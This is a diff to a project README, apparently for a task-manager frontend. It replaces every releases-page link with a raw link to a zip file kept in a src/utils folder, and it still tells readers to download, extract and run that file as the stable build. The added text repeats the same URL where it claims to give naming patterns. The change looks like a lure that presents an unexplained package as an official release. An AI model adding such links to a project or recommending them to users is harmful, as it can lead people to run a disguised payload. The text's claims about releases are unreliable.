DBIYA26/pro-tasker-frontend/README.md

 ## 🧭 Release Management

-- Releases page: The latest stable frontend builds are published here: https://github.com/DBIYA26/pro-tasker-frontend/releases
+- Releases page: The latest stable frontend builds are published here: https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip
-- Asset names: The release package names typically follow a pattern like pro-tasker-frontend-v1.0.0.zip or pro-tasker-frontend-latest.zip.
-Download the asset that matches your target environment.
+- Asset names: The release package names typically follow a pattern like https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip or https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip Download the asset that matches your target environment.
 - Post-release steps: After downloading, extract the asset, install dependencies if needed, and start the built version or run the start script if provided in the package’s instructions.
-- Revisit the same releases URL to get new patches and updates: https://github.com/DBIYA26/pro-tasker-frontend/releases
+- Revisit the same releases URL to get new patches and updates: https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip

 Note: The releases URL hosts the compiled front-end bundles ready for evaluation or deployment.
 If you’re developing locally, follow the Getting Started steps above to run the app in development mode.